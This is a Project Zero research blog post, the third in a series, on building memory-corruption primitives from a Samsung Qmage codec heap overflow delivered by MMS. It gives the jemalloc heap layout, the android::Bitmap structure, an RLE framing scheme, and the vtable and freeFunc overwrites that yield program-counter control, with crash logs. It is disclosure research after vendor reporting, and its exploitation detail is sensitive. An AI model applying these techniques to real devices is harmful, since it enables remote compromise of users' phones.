Tuesday, July 28, 2020

MMS Exploit Part 3: Constructing the Memory Corruption Primitives

Posted by Mateusz Jurczyk, Project Zero

This post is the third of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and linked here.

Introduction

In Part 2, I discussed how I managed to fuzz-test the Qmage codec on Google infrastructure at the turn of 2019/2020. It led to the discovery of a huge number of unique crashes, many of which manifested obvious memory corruption problems. After reporting them to Samsung on 28 January 2020, my attention turned to the idea of using some of the vulnerabilities to write an MMS exploit. There was evidence that the Samsung Messages app processed incoming bitmaps without any user interaction, so this seemed like the perfect opportunity to see just how realistic such an attack could be with a wide range of image parsing bugs to choose from. The prospect of developing a zero-click exploit running over the mobile network was new and thrilling to me, and I was very excited to take on the challenge.

The first step in the process was to identify the crashes that were not just high severity on paper, but were also the most convenient for exploitation in a real-life scenario. An ideal bug would be easy to work with (i.e. require a relatively simple structure of the Qmage file), and would provide full control over the memory corruption condition. In case of a heap buffer overflow, this would imply control over the allocation size, overflow size, overflow data, and possibly even the overflow offset (in a non-linear case). Such a bug would lay a strong foundation for any higher-order mechanisms that would have to be implemented in the exploit.

This blog post describes the additional crash triage I performed to find the most suitable bug for exploitation, followed by an analysis of how it was used to turn plain memory corruption into more useful primitives: control over the instruction pointer (PC), and the ability to "probe" the existence of memory ranges. In practice, I was simultaneously experimenting with the MMS protocol to get an initial feel of its design, capabilities and limitations. However, for the sake of clarity, I will limit the scope of this write-up to the low level exploitation details, and proceed to link the memory corruption with the MMS delivery channel in future posts. Let's get started!

Heap fundamentals in Android

The first observation to make is that a great majority of the identified crashes were heap-oriented. There were some instances of stack buffer overflows, but the stack cookie mitigation rendered them non-exploitable. There were also other cases such as reads from uninitialized stack-based pointers, but they didn't seem particularly useful, so in the end, I decided to focus on the 174 "write" crashes, all of which referenced out-of-bounds heap addresses. In principle, such bugs tend to provide the most flexibility in exploitation, as they can be used to corrupt a variety of objects in memory. So, if we are going to work with the Android heap, we should get familiar with the underlying allocator and its security properties.

The allocator currently used in all modern versions of Android is jemalloc (side note: this is going to change with the introduction of Scudo in Android 11). There were two main resources that I found especially useful when learning and experimenting with jemalloc:

  • "The Shadow over Android: Heap exploitation assistance for Android’s libc allocator" at INFILTRATE 2017 (slides) and the shadow exploitation framework itself (GitHub).
  • "A Tale of Two Mallocs: On Android libc Allocators" at INFILTRATE 2018 (video), and the accompanying blog post series (specifically part 2).

I won't go into much detail regarding the internals of the allocator (you can find them in the above sources), but I would like to highlight the following properties that are most relevant to this research:

  • Determinism: jemalloc behaves deterministically, at least to the extent observable by the attacker. For example, with a clean state of the heap, two subsequent allocations of the same size are positioned next to each other.
  • Lack of inline metadata: metadata is stored separately from the allocation itself, so an overflow of one chunk (or "region", as it's called in jemalloc) immediately overwrites the data of the adjacent one, with no metadata in between.
  • Division into size classes: allocations are grouped by size, so any two allocations can only be adjacent to each other if they fall into the same size "bin".
  • Thread caches: a mechanism called "tcaches" improves locality by quickly reusing recently freed regions. This guarantees the predictability of some allocation patterns – for example, a malloc → free → malloc sequence of the same length will return the same address twice.
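To make the size-class property concrete, here is a minimal Python sketch of how a request size could map to a small jemalloc bin. The class spacing (16-byte steps up to 128 bytes, then four classes per power-of-two doubling) is my assumption about the jemalloc configuration on 64-bit Android, and size_class and same_bin are hypothetical helpers, not part of any jemalloc API.

```python
def size_class(size: int) -> int:
    """Round a request up to an assumed jemalloc small size class.

    Assumption: 64-bit jemalloc with a 16-byte quantum, i.e. classes
    8, 16, 32, 48, ..., 128, followed by four evenly spaced classes per
    doubling (160, 192, 224, 256, 320, ...).
    """
    if size <= 0:
        raise ValueError("size must be positive")
    if size <= 8:
        return 8
    if size <= 128:
        return (size + 15) // 16 * 16
    # Largest power of two strictly below `size`; classes inside each
    # doubling are spaced a quarter of that power of two apart.
    base = 1 << ((size - 1).bit_length() - 1)
    step = base // 4
    return (size + step - 1) // step * step


def same_bin(a: int, b: int) -> bool:
    """Two regions can only be neighbours if they share a size class."""
    return size_class(a) == size_class(b)
```

Under these assumptions, a 130-byte and a 160-byte request share a bin and may end up adjacent, whereas a 1120-byte and a 160-byte request never will.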

These characteristics can be favorable or disadvantageous depending on the specific bug and context around it. Overall, in this case, I think these properties added up to a "net positive" from the attacker's perspective, which is not great for user security. For this reason, I am really looking forward to seeing the hardened Scudo allocator enabled by default in Android 11.

Now that we have some background on the behavior we can expect from jemalloc, it's time to analyze the write-violation crashes in search of the most promising ones.

Finding the right bug

With all that we know about jemalloc, we can make a working assumption that if there are two malloc calls, and they can be made to be of a similar size, the second one can be corrupted by the first one with a forward overflow, because it is (usually) placed at a higher address. So in order to assess the usability of a crash, we need to determine:

  • What region is overwritten by the bug?
  • What are the other allocations that are requested between the overwritten allocation and the overflow, and are used after the overflow?

The SkCodecFuzzer test harness has an -l flag that enables the logging of all mallocs and frees to stderr at runtime. It can be used to match the address of the invalid memory access with the corresponding allocation, and see what other allocations are made in between. For example, if we take the signal_sigsegv_40064924d0_4336_c77562cdc52d1baed45ff05bc9ae2023.qmg sample and run it through the loader with the -l flag, we should see the following output (malloc stack traces were edited out for brevity):

[...]
[+] Detected image characteristics:
[+] Dimensions:      148 x 192
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[DEBUG] malloc(    113664) = {0x408c0ff400 .. 0x408c11b000}
[DEBUG] malloc(       104) = {0x408c11cf98 .. 0x408c11d000}
[DEBUG] malloc(     28416) = {0x408c11e100 .. 0x408c125000}
[DEBUG] malloc(        22) = {0x408c126fea .. 0x408c127000}
[DEBUG] malloc(      4120) = {0x408c128fe8 .. 0x408c12a000}
ASAN:SIGSEGV
=================================================================
==212100==ERROR: AddressSanitizer: SEGV on unknown address 0x408c125000 (pc 0x400396c4d0 sp 0x4000d04c90 bp 0x4000d04c90 T0)
    #0 0x002b54d0 in libhwui.so (QuramQmageGrayIndexRleDecode+0xdc)
    #1 0x0029d584 in libhwui.so (__QM_WCodec_decode+0xa3c)
    #2 0x0029c9b4 in libhwui.so (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)
    #3 0x0029ae7c in libhwui.so (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)
[...]

Here, the invalid 0x408c125000 address is the same as the end of the third allocation requested after printing out the image characteristics. Its size of 28416 bytes coincides with 148 (width) × 192 (height), so we can presume that it is a pixel storage buffer and therefore has controlled length. There are two more allocations (of 22 and 4120 bytes) made after the overflown buffer and kept alive until the crash, so each of them could be the target of the memory corruption. In the call stack, we can also see that the problem occurs during RLE decoding, which is a well-known algorithm and thus would probably meet our criteria of being easy to work with. This is how a specific crash can be evaluated for exploitability.

Since I wished to explore the whole range of options and manually performing the same analysis on the other 173 unique "write" crashes seemed tedious, I wrote a quick bash script to generate and process the crash logs to match the invalidly accessed addresses with the corresponding heap regions. After sorting and deduplicating, they added up to a total of 23 unique overwritten allocation sites. I was not particularly interested in QMv1 crashes (the old format wasn't correctly handled by the Messages application), so I filtered them out from the results, leaving me with 17 allocations subject to overflow. That was a much more manageable number of cases to go through by hand.
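The bash script itself is not reproduced here, but the matching step can be sketched in a few lines of Python. This is only an illustration under assumptions: it expects log lines shaped like the harness output shown earlier, ignores frees, and treats the region whose end lies closest below the faulting address as the overflown one. The function name find_overflown_allocation is hypothetical.

```python
import re

# Patterns modelled on the harness excerpts above; the "[DEBUG] " prefix
# is optional because it appears in some excerpts and not in others.
MALLOC_RE = re.compile(
    r"malloc\(\s*(\d+)\)\s*=\s*\{(0x[0-9a-f]+)\s*\.\.\s*(0x[0-9a-f]+)\}")
SEGV_RE = re.compile(r"SEGV on unknown address (0x[0-9a-f]+)")


def find_overflown_allocation(log: str):
    """Return (overflown, later) for one crash log.

    `overflown` is the (size, start, end) tuple of the region whose end is
    nearest at or below the faulting address; `later` lists the regions
    requested after it, i.e. the potential corruption targets.
    """
    allocations = []  # (size, start, end) in request order
    fault = None
    for line in log.splitlines():
        m = MALLOC_RE.search(line)
        if m:
            allocations.append(
                (int(m.group(1)), int(m.group(2), 16), int(m.group(3), 16)))
        m = SEGV_RE.search(line)
        if m:
            fault = int(m.group(1), 16)
    if fault is None:
        return None, []
    ended_before = [i for i, a in enumerate(allocations) if a[2] <= fault]
    if not ended_before:
        return None, []
    idx = max(ended_before, key=lambda i: allocations[i][2])
    return allocations[idx], allocations[idx + 1:]
```

Run against the first log excerpt above, this picks the 28416-byte region and reports the 22-byte and 4120-byte allocations as candidates for corruption.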

After a brief analysis, I concluded that many of them were not optimal for my exploit, because they were temporary buffers, allocated and immediately overflown without any mallocs taking place in between. Taking advantage of such a bug would require an earlier allocation to be mapped above the buffer – a heap state that is possible, but harder to reliably achieve with the limited heap manipulation capabilities of the image codec. The remaining allocation sites that had some potential could be divided into four major groups:

Option 1: The pixel storage buffer associated with the Bitmap object, which is the #1 malloc made by the harness after parsing the headers
Example crash ID: e9e773f3e0a6d155636a52a5418d9160
Size: Controlled through the bitmap dimensions
Allocated in: SkBitmap::tryAllocPixels
Overflown by:
  • QuramQumageDecoder8bit
  • QuramQumageDecoder32bit24bit
  • QuramQmageGrayIndexRleDecode
  • qme_inflate_fast (via PVcodecDecoder_zip)
Potential corruption targets: The android::Bitmap object allocated directly after, and any further allocation made by the specific codec (depending on which one is used to trigger the overflow)

Option 2: A temporary output storage buffer, which is the #3 malloc made by the harness after parsing the headers (preceded only by the bitmap object allocation), and the first allocation in the getAndroidPixels call
Example crash ID: b0749f475f0b7af444625c3d1c3a5be8
Size: Controlled through the bitmap dimensions
Allocated in: QuramQmageDecodeFrame_Rev14474_20150224
Overflown by:
  • QuramQumageDecoder8bit
  • QuramQmageGrayIndexRleDecode
Potential corruption targets:
  • The decoding context structure of size 1688 allocated at the beginning of QuramQumageDecoder8bit, as well as any of the numerous other allocations in that function
  • The RLE decoding context structure of size 4120 allocated in QuramQmageGrayIndexRleDecode

Option 3: A temporary RLE decoding buffer
Example crash ID: 03f2d8074d5797537e8c615b2fa53cef
Size: Controlled 32-bit integer from the input stream
Allocated in:
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Overflown by:
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Potential corruption targets: The RLE decoding context structure of size 4120

Option 4: A temporary zlib decoding buffer
Example crash ID: cbd3dbc9e71b2fec9606eaa3eafce056
Size: Controlled through the bitmap dimensions
Allocated in: QuramQumageDecoder32bit24bit
Overflown by: qme_inflate (as called by QuramQumageDecoder32bit24bit → DecodePrediction2dZip → PVcodecDecoder_zip → qme_uncompress)
Potential corruption targets: The zlib decoding context structure of size 12928

After some consideration, I decided that option 1 (bitmap pixel buffer) was the most promising one, because:

  • It was the earliest overflown malloc, making it possible to corrupt the widest range of subsequently allocated objects, including the Bitmap object.
  • The size was controlled, and in the case of RLE and zlib decompression, the overflow length and data were controlled too. On top of it, I was familiar with both algorithms and thus didn't anticipate any problems constructing the exploit files.

To be specific, I started my experimentation with the e418c0496cb1babf0eba13026f4d1504 crash and the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample. It generated the following report (malloc stack traces again edited out):

[...]
[+] Detected image characteristics:
[+] Dimensions:      40 x 7
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
malloc(      1120) = {0x408c13bba0 .. 0x408c13c000}
malloc(       104) = {0x408c13df98 .. 0x408c13e000}
malloc(        24) = {0x408c13ffe8 .. 0x408c140000}
malloc(      4120) = {0x408c141fe8 .. 0x408c143000}
ASAN:SIGSEGV
=================================================================
==3746114==ERROR: AddressSanitizer: SEGV on unknown address 0x408c13c000 (pc 0x40071feb74 sp 0x4000d0b1f0 bp 0x4000d0b1f0 T0)
    #0 0x00249b74 in libhwui.so (QuramQmageGrayIndexRleDecode+0xd8)
    #1 0x002309d8 in libhwui.so (PVcodecDecoderIndex+0x110)
    #2 0x00230854 in libhwui.so (__QM_WCodec_decode+0xe4)
    #3 0x00230544 in libhwui.so (Qmage_WDecodeFrame_Low+0x198)
    #4 0x0022c604 in libhwui.so (QuramQmageDecodeFrame+0x78)
[...]

Here, we are overflowing the 1120-byte buffer (width × height × bpp; 40 × 7 × 4 = 1120), and can corrupt the three subsequent ones. The first (104 bytes) is the Bitmap structure, the second (24 bytes) is the RLE-compressed input stream, and the third (4120 bytes) is the RLE decoder context structure. The Bitmap object sounds the most useful, and since I have already mentioned it so many times, let's finally look into it to see how it works! We'll be operating on the assumption that if we adjust the Qmage dimensions such that the pixel buffer consumes 104 bytes (e.g. 13x2), then the two allocations will likely be adjacent on Android, giving us full (linear) control over the second region.

Enter the Android Bitmap object

First of all, it is important to note that the Bitmap object created by our test harness is not exactly the same as the one used in Android, because of a difference in the allocator objects used (SkBitmap::HeapAllocator vs GraphicsJNI's HeapAllocator). This is irrelevant for fuzzing, but makes a big difference in exploit development. In order to learn about the actual object being allocated on Android, we can use a simple Frida script that hooks the heap-related functions and logs all of their invocations with stack trace. If we attach it to the com.samsung.android.messaging process and send an MMS with the proof-of-concept image, we should see output similar to the following (I demangled some symbols and edited out argument definitions for brevity):

[10036] calloc(1120, 1) => 0x7bc1e95900
    0x7cbba83684 libhwui.so!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54 libhwui.so!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178 libandroid_runtime.so!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80 libhwui.so!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8 libandroid_runtime.so!0x187ae8
    0x7cbd81fc8c libandroid_runtime.so!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[10036] malloc(160) => 0x7b8cd569e0
    0x7cbddd35c4 libc++.so!operator new+0x24
    0x7cbe67e608
[10036] malloc(24) => 0x7b8ca92580
    0x7cbb87baf4 libhwui.so!QuramQmageGrayIndexRleDecode+0x58
    0x7cbe67e608
[10036] calloc(1, 4120) => 0x7bc202c000
    0x7cbb89fb14 libhwui.so!init_process_run_dec+0x20
    0x7cbb87bb34 libhwui.so!QuramQmageGrayIndexRleDecode+0x98
    0x7cbb8629d4 libhwui.so!PVcodecDecoderIndex+0x10c
    0x7cbb862850 libhwui.so!__QM_WCodec_decode+0xe0
    0x7cbb862540 libhwui.so!Qmage_WDecodeFrame_Low+0x194
    0x7cbb85e600 libhwui.so!QuramQmageDecodeFrame+0x74
[...]

Here, we can again see the familiar allocations made before the overflow occurs. The only difference is the size of the Bitmap object: it's 104 in our loader but 160 on Android. Unfortunately, Frida didn't correctly unwind the stack for the malloc call, but based on the pixel buffer stack trace, we can figure out that it takes place in android::Bitmap::allocateHeapBitmap:

sk_sp<Bitmap> Bitmap::allocateHeapBitmap(size_t size, const SkImageInfo& info, size_t rowBytes) {
    void* addr = calloc(size, 1);
    if (!addr) {
        return nullptr;
    }
    return sk_sp<Bitmap>(new Bitmap(addr, size, info, rowBytes));
}

As expected, there is a calloc call for allocating pixel storage, followed by the creation of the Bitmap object itself. This is how the function prologue looks in Hex-Rays:

[Figure: Decompiled prologue of the allocateHeapBitmap method]

If we quickly change the Qmage file dimensions to 10x4, such that the pixel buffer becomes 160 (or any length between 129 and 160, which is the relevant jemalloc bin size), then we can use Frida to verify that the two Bitmap-related allocations are indeed adjacent:

[15699] calloc(160, 1) => 0x7b88feb8c0
    0x7cbba83684 libhwui.so!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54 libhwui.so!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178 libandroid_runtime.so!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80 libhwui.so!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8 libandroid_runtime.so!0x187ae8
    0x7cbd81fc8c libandroid_runtime.so!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[15699] malloc(160) => 0x7b88feb960
    0x7cbddd35c4 libc++.so!operator new+0x24
    0x7cbe582608

The difference between 0x7b88feb8c0 and 0x7b88feb960 is 160 (0xA0), exactly the size of the first chunk, which means that we should be able to precisely overwrite the succeeding android::Bitmap object. This behavior is not 100% reliable and is hugely dependent on the preexisting heap state of the attacked app, but I found that it was reliable enough to enable successful, practical attacks. I will expand more on this in the next blog post in the series.
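The arithmetic behind this experiment is simple enough to script. The sketch below, using hypothetical helper names, lists the bitmap dimensions whose 4-bytes-per-pixel buffer falls into a given size range, and checks whether two logged regions are back to back. The 129 to 160 range is taken from the text above; the 32-pixel search limit is arbitrary.

```python
def dimensions_for_bin(lo, hi, bytes_per_pixel=4, max_side=32):
    """List (width, height) pairs whose pixel buffer size is in [lo, hi]."""
    return [(w, h)
            for w in range(1, max_side + 1)
            for h in range(1, max_side + 1)
            if lo <= w * h * bytes_per_pixel <= hi]


def is_adjacent(first_addr, first_region_size, second_addr):
    """True if the second region starts exactly where the first one ends."""
    return second_addr == first_addr + first_region_size


# Dimensions that place the pixel buffer in the same bin as the 160-byte
# android::Bitmap object, and the adjacency check for the Frida log above.
candidates = dimensions_for_bin(129, 160)
adjacent = is_adjacent(0x7b88feb8c0, 160, 0x7b88feb960)
```

Both 10x4 and 4x10 appear among the candidates, while 13x2 (104 bytes) does not, which is why the dimensions had to change once the real Bitmap size on Android was known.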

It's finally time to look at the android::Bitmap layout in memory. Currently, the class is defined in frameworks/base/libs/hwui/hwui/Bitmap.h in the Android source tree. Some of its private fields are visible there, but their combined size clearly doesn't add up to 160 bytes. This is because the code makes heavy use of C++ inheritance: android::Bitmap inherits from SkPixelRef → SkRefCnt → SkRefCntBase. After untangling the above chain of classes and figuring out the alignment requirements for each field, I arrived at the following layout:

struct android::Bitmap {

  /* +0x00 */ void *vtable;

  //
  // class SK_API SkRefCntBase
  //

  /* +0x08 */ mutable std::atomic<int32_t> fRefCnt;

  //
  // class SK_API SkPixelRef : public SkRefCnt
  //

  /* +0x0C */ int     fWidth;
  /* +0x10 */ int     fHeight;
  /* +0x18 */ void*   fPixels;
  /* +0x20 */ size_t  fRowBytes;

  /* +0x28 */ mutable std::atomic<uint32_t> fTaggedGenID;

  struct /* SkIDChangeListener::List */ {
  /* +0x30 */ std::atomic<int> fCount;
  /* +0x34 */ SkOnce           fOSSemaphoreOnce;
  /* +0x38 */ OSSemaphore*     fOSSemaphore;
  } fGenIDChangeListeners;

  struct /* SkTDArray<SkIDChangeListener*> */ {
  /* +0x40 */ SkIDChangeListener* fArray;
  /* +0x48 */ int                 fReserve;
  /* +0x4C */ int                 fCount;
  } fListeners;

  /* +0x50 */ std::atomic<bool> fAddedToCache;

  /* +0x51 */ enum Mutability {
  /* +0x51 */   kMutable,
  /* +0x51 */   kTemporarilyImmutable,
  /* +0x51 */   kImmutable,
  /* +0x51 */ } fMutability : 8;

  //
  // class ANDROID_API Bitmap : public SkPixelRef
  //

  struct /* SkImageInfo */ {
  /* +0x58 */ sk_sp<SkColorSpace> fColorSpace;
  /* +0x60 */ int fWidth;
  /* +0x64 */ int fHeight;
  /* +0x68 */ SkColorType fColorType;
  /* +0x6C */ SkAlphaType fAlphaType;
  } mInfo;

  /* +0x70 */ const PixelStorageType mPixelStorageType;
  /* +0x74 */ BitmapPalette mPalette;
  /* +0x78 */ uint32_t mPaletteGenerationId;
  /* +0x7C */ bool mHasHardwareMipMap;

  union {
    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ void* context;
  /* +0x90 */ FreeFunc freeFunc;
    } external;

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ int fd;
  /* +0x90 */ size_t size;
    } ashmem;

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ size_t size;
    } heap;

    struct {
  /* +0x80 */ GraphicBuffer* buffer;
    } hardware;
  } mPixelStorage;

  /* +0x98 */ sk_sp<SkImage> mImage;
};

We can immediately spot a number of interesting fields such as the vtable, pointer to backing pixel storage, bitmap dimensions, a raw function pointer (freeFunc), and pointers to other C++ objects such as SkColorSpace, GraphicBuffer and SkImage. The class clearly has the potential to supply many useful exploitation primitives. Let's go ahead and test some initial ideas to see how the code behaves in contact with a corrupted Bitmap object.

Building code execution primitives

In order to start experimenting with the heap corruption, we have to construct a test case that will be easy to adjust for different tests. For building editable binary files for testing file format parsers, I usually use nasm. It allows me to write code-like .asm source files that specify the values of respective header fields with the db/dw/dd/… pseudo-instructions, may include comments, and can be quickly "compiled" to raw binary form. This is also what I used here to craft the proof-of-concept Qmage file from scratch, based on the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample and on reverse engineering the codec in libhwui.so. This is where the debug symbols from old builds of libQmageDecoder.so that I dug up earlier in the recon phase (as discussed in Part 1) proved very useful.

The nasm source code of the Qmage file I used for experimentation can be found here. It consists of the following logical parts:

  • File header specifying a QG1.2 format version (equivalent to 2.0, as explained in Part 2) and 4x10 bitmap dimensions.
  • A zlib-compressed color table with all 0x41's.
  • A required \xFF\x00 marker, followed by the 0x06 RLE compression type.
  • An RLE-compressed stream of 161-320 bytes: the first 160 to fill out the pixel buffer, followed by 1-160 bytes depending on what portion of the android::Bitmap object we intend to overwrite.
  • A trailing \xFF\x00 marker.

Notably, the RLE compression used in Qmage is not the simple one we know from BMP files. Based on the structure of the code and some RLE-related symbols (init_process_run, process_run, init_process_run_dec, process_run_dec), we can deduce that it is probably a MELCODE scheme. For our purposes, though, it's not much more complicated. If we intend to take a data blob and wrap it with the RLE structure while actually not reducing its size (similar to how zlib compression level 0 works), it's a matter of adding a simple prefix and suffix. For example, a compressed 8-byte string "ABCDEFGH" takes the following form:

00000000: 0e 00 00 00 08 00 00 00 41 42 43 44 45 46 47 48  ........ABCDEFGH
00000010: aa aa                                            ..

The little-endian 0x0000000E value indicates the length of the compressed stream (in this example, it equals the 14 bytes that follow the length field itself), and 0x00000008 specifies the number of runs, which in this case equals the length of the decompressed data. Next comes the raw data, and finally N÷4 bytes of 0xAA, each of which signifies four runs of one byte each. With that out of the way, we can proceed to testing potential code execution primitives.
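The prefix-and-suffix wrapping can be captured in a short Python helper. This is a sketch derived only from the single hex dump above: the function name wrap_rle is hypothetical, the length field is assumed to count every byte after itself, and the input length is assumed to be a multiple of four so that N÷4 is exact.

```python
import struct


def wrap_rle(data: bytes) -> bytes:
    """Wrap raw bytes in the 'stored' RLE framing described above.

    Layout (all integers little-endian):
      u32  length of everything that follows this field (assumption)
      u32  number of runs, here equal to len(data)
      ...  the raw data
      ...  len(data) / 4 bytes of 0xAA, each encoding four 1-byte runs
    """
    if len(data) % 4 != 0:
        raise ValueError("this sketch only handles lengths divisible by 4")
    body = struct.pack("<I", len(data)) + data + b"\xaa" * (len(data) // 4)
    return struct.pack("<I", len(body)) + body
```

For the 8-byte string "ABCDEFGH", wrap_rle reproduces the 18 bytes of the hex dump; whether the same framing holds for other lengths has not been verified here.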

The first idea is to overwrite the vtable pointer and see if/where the code crashes. Since it's the first field in memory, we only have to write 8 bytes past the end of the pixel buffer. If we set them to AAAAAAAA and send such a file via MMS, we should see the following crash:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151 in tid 24642 (ReferenceQueueD), pid 24624 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 24624, tid: 24642, name: ReferenceQueueD  >>> com.samsung.android.messaging <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151
    x0  0000007c2ac85e40  x1  0000007c25ae9724
    x2  0000007cbd81f1b8  x3  0000007c2ad2d9c0
    x4  000000006f2693ac  x5  0000007c25ae96e4
    x6  0000000000000001  x7  0000000000000000
    x8  4141414141414141  x9  0000000000000000
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000000000360168  x13 0000000000004000
    x14 0000000000000004  x15 0000000000000000
    x16 0000007c25ae9710  x17 0000000000000bc3
    x18 0000007bd31ee000  x19 0000007c2ad2d9c0
    x20 0000007c3034ff80  x21 0000000013126208
    x22 0000000013126208  x23 00000000131261a0
    x24 000000006f26bb50  x25 00000000131261e0
    x26 0000007cc0350cb0  x27 0000007c3a3f5000
    x28 0000007c25aea020  x29 0000007c25ae9700
    sp  0000007c25ae96f0  lr  00000000705bdc44
    pc  0000007cbd81f210

backtrace:
      #00 pc 0000000000186210  /system/lib64/libandroid_runtime.so (Bitmap_destruct(android::BitmapWrapper*)+88) (BuildId: 21b5827e07da22480245498fa91e171d)
[...]

There is an access to the controlled 0x4141414141414141 address in Bitmap_destruct. The code accessing the pointer is as follows:

.text:0000000000186210                 LDR             X8, [X8,#0x10]
.text:0000000000186214                 BLR             X8

As expected, we get an arbitrary vtable call. It is a great first primitive to confirm, and it is direct evidence that everything seems to be working according to plan. Of course, at this point, we don't know where any code is located (to redirect execution there), or even where our controlled data is situated (to set up our fake vtable). However, let's focus on one thing at a time. What's important is that the vtable call is controlled by the value of the adjacent fRefCnt field, so we may choose to trigger it or not by setting the reference counter to a small or large integer.

The second eye-catching field that can likely be abused to hijack code execution is the freeFunc function pointer in the mPixelStorage union:

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ void* context;
  /* +0x90 */ FreeFunc freeFunc;
    } external;

We can check where the pointer is used by running a quick cs.android.com search. As it turns out, it is called in the Bitmap::~Bitmap destructor:

        case PixelStorageType::External:
            mPixelStorage.external.freeFunc(mPixelStorage.external.address,
                                            mPixelStorage.external.context);
            break;

If we look at the broader context of the code, the destructor may provide the attacker with an assortment of primitives, depending on the value of the mPixelStorageType enum: arbitrary munmap+close, arbitrary free, and another arbitrary vtable call (through the mPixelStorage.hardware.buffer pointer). However, I find the freeFunc pointer the most useful, especially in a potential one-shot scenario where we try to take over control of the app with a single, specially crafted MMS message. Conveniently, the function also takes two arguments, which we may control – or in fact, must control, because reaching the freeFunc field with a linear overflow is only possible after overwriting both address and context.

The only problem with this technique is that the Bitmap destructor itself is called through the vtable at offset 0, the one that we have to corrupt in order to get to the deeper fields in the class. Therefore, we can only use it in our exploit if we leave the vtable pointer intact after the overflow. This, in turn, requires the knowledge of the libhwui.so base address. At this point in the story, we don't know how we could leak such information yet, but exploitation gadgets like this are worth writing down even if we don't have all the pieces of the puzzle to make use of them yet.

To make sure that we're reading the code right, we should confirm the behavior in practice. We can construct a Qmage sample that overwrites the full 160 bytes of the Bitmap object with a marker 0x41 byte, and then fine-tune a few specific fields for the experiment:

  • vtable set to its original value, in my case 0x7cbbdfc4e0 (0x7cbb632000 base address + 0x7ca4e0 offset)
  • fRefCnt set to 1
  • mPixelStorageType set to 0 (External)
  • mPixelStorage.external.address set to 0xaaaa...aaa.
  • mPixelStorage.external.context set to 0xbbbb...bbb.
  • mPixelStorage.external.freeFunc set to 0xcccc...ccc.
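The field values listed above could be assembled into the 160 overwriting bytes roughly as follows. This Python sketch takes the offsets from the android::Bitmap layout shown earlier; the 4-byte width of mPixelStorageType is inferred from the gap between +0x70 and +0x74, and build_fake_bitmap is a hypothetical helper rather than the tooling actually used.

```python
import struct

BITMAP_SIZE = 160

# Offsets copied from the android::Bitmap layout shown earlier.
OFF_VTABLE = 0x00
OFF_REFCNT = 0x08
OFF_PIXEL_STORAGE_TYPE = 0x70  # assumed to be a 4-byte enum
OFF_EXT_ADDRESS = 0x80
OFF_EXT_CONTEXT = 0x88
OFF_EXT_FREEFUNC = 0x90

PIXEL_STORAGE_EXTERNAL = 0


def build_fake_bitmap(vtable, address, context, free_func):
    """Return 160 bytes of 0x41 with the interesting fields patched in."""
    buf = bytearray(b"\x41" * BITMAP_SIZE)
    struct.pack_into("<Q", buf, OFF_VTABLE, vtable)
    struct.pack_into("<i", buf, OFF_REFCNT, 1)
    struct.pack_into("<I", buf, OFF_PIXEL_STORAGE_TYPE, PIXEL_STORAGE_EXTERNAL)
    struct.pack_into("<Q", buf, OFF_EXT_ADDRESS, address)
    struct.pack_into("<Q", buf, OFF_EXT_CONTEXT, context)
    struct.pack_into("<Q", buf, OFF_EXT_FREEFUNC, free_func)
    return bytes(buf)


# Values from the experiment; the vtable address is specific to one boot
# of one device and is only known here because the test is run locally.
fake = build_fake_bitmap(
    vtable=0x7cbb632000 + 0x7ca4e0,
    address=0xaaaaaaaaaaaaaaaa,
    context=0xbbbbbbbbbbbbbbbb,
    free_func=0xcccccccccccccccc,
)
```

Appending these bytes to 160 bytes of filler for the pixel buffer gives the 320-byte decompressed stream mentioned in the file structure above.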

If we send it via MMS, we should see the following crash in logcat:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 13700 (pool-5-thread-1), pid 12954 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12954, tid: 13700, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc
    x0  aaaaaaaaaaaaaaaa  x1  bbbbbbbbbbbbbbbb
    x2  0000000000000001  x3  0000000000000000
    x4  0000007c2be315d0  x5  0000007c3910cc64
    x6  0000000000000000  x7  00000000186f2b72
    x8  cccccccccccccccc  x9  0000007cbbdfc4f0
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000007c3175b20c  x13 000000005f0cc80f
    x14 003419f64036d144  x15 000051761dd7a34a
    x16 0000007cbd8f3230  x17 0000007cbba98620
    x18 0000007bbc84e000  x19 0000007bc8ff8dc0
    x20 0000000000000000  x21 0000007bc9153540
    x22 000000000000000c  x23 0000000000000000
    x24 0000000000000000  x25 0000000000000002
    x26 0000007c2be32d50  x27 0000000000000059
    x28 0000007cc03fa7c0  x29 0000007c2be319c0
    sp  0000007c2be319b0  lr  0000007cbba69f00
